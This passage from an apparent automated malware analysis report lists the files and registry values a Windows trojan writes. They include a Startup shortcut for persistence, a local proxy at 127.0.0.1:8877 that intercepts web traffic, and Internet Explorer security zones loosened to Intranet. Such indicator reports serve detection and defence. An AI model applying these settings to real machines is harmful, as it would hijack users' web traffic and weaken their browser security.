%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns73.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns46.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns37.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns89.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns30.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns90.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns95.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns67.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns96.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns36.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns60.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns58.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns33.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns68.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns98.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns39.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns28.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns82.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns52.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns69.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns80.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns49.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns55.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns41.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns66.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns44.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns65.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns70.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns40.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns32.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns34.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns45.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns31.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns85.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns91.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns38.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns88.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns71.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns43.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns35.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA0.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3B.tmp (0 bytes)

The process internetport3.exe:360 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\desktop.ini (67 bytes)
C:\a\loogg2.txt (240 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\desktop.ini (67 bytes)
C:\a\logff.txt (718 bytes)

The process DYK287G2Jhwy64P0Ln0s.exe:1012 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\ckkkp[1].htm (324 bytes)
C:\a\1logff.txt (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\aDYK287G2Jhwy64P0Ln0s.html (303 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\inetc.dll (20 bytes)
C:\a\1loogg2.txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\DYK287G2Jhwy64P0Ln0s.html (716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\ns27.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\apDYK287G2Jhwy64P0Ln0s.html (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\ckkk[1].htm (303 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\localhost[1].htm (716 bytes)
C:\a\vv11111.txt (22835 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\aDYK287G2Jhwy64P0Ln0s.html (0 bytes)
C:\a\ProcessList.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\DYK287G2Jhwy64P0Ln0s.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\ns27.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\apDYK287G2Jhwy64P0Ln0s.html (0 bytes)
C:\a\vv11111.txt (0 bytes)

The process %original file name%.exe:1756 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\a\FiddlerCore.dll (9485 bytes)
C:\a\zuur.txt (2 bytes)
C:\a\internetport3.exe (10 bytes)
C:\a\wcheckf.exe (397 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\System.dll (11 bytes)
C:\a\zhho.txt (3 bytes)
C:\a\zvchk.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\uniqueDYK287G2Jhwy64P0Ln0s[1].htm (10 bytes)
%Program Files%\FastInternet\app.exe (1078 bytes)
C:\a\29935426.bat (287 bytes)
C:\a\winonit.exe (435 bytes)
C:\a\DYK287G2Jhwy64P0Ln0s.exe (3808 bytes)
C:\a\ayyyyy.txt (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\AccessControl.dll (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\inetc.dll (20 bytes)
C:\a\ukey.ini (27 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\bdcount[1].htm (8 bytes)
C:\a\zvv.txt (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\DYK287G2Jhwy64P0Ln0s[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\UAC.dll (13 bytes)
C:\a\ver.ini (8 bytes)
C:\a\getcap.exe (10027 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\pwgen.dll (17 bytes)
C:\a\uniqueDYK287G2Jhwy64P0Ln0s.ini (10 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\intr.lnk (527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\cki[1].htm (11 bytes)
%System%\63839615.bat (19 bytes)
C:\a\install.txt (1 bytes)
%Program Files%\FastInternet\dotuninstall.exe (1084 bytes)
C:\a\wincheckfe.exe (778 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp (4 bytes)
C:\a\lOD0hGDlkq.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\SimpleFC.dll (5289 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\UAC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\pwgen.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\AccessControl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\SimpleFC.dll (0 bytes)

Registry activity

The process winonit.exe:1360 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 03 00 00 00 28 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""

"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E8 8D 5D E1 37 C1 36 55 E7 82 31 EC 60 50 5D AD"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"-loopback>

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process getcap.exe:500 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 AD A8 23 DC 66 62 C4 37 71 C6 6A 38 98 24 0B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process WMIC.exe:568 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D A5 EA 88 81 6C 58 DD B8 35 05 49 37 C5 C2 46"

The process wincheckfe.exe:1768 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD D9 CB 7A EA 62 17 E3 D3 1C D4 6B F9 6C A5 77"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process wcheckf.exe:484 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 03 00 00 00 28 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""

"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 C5 1C 10 E0 0C B7 64 12 3A 69 55 38 29 94 B0"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"-loopback>

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process vchk.exe:1976 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 03 00 00 00 28 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""

"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "41 4D 48 51 19 FD 70 B2 60 12 A3 A6 B7 0C 60 D0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
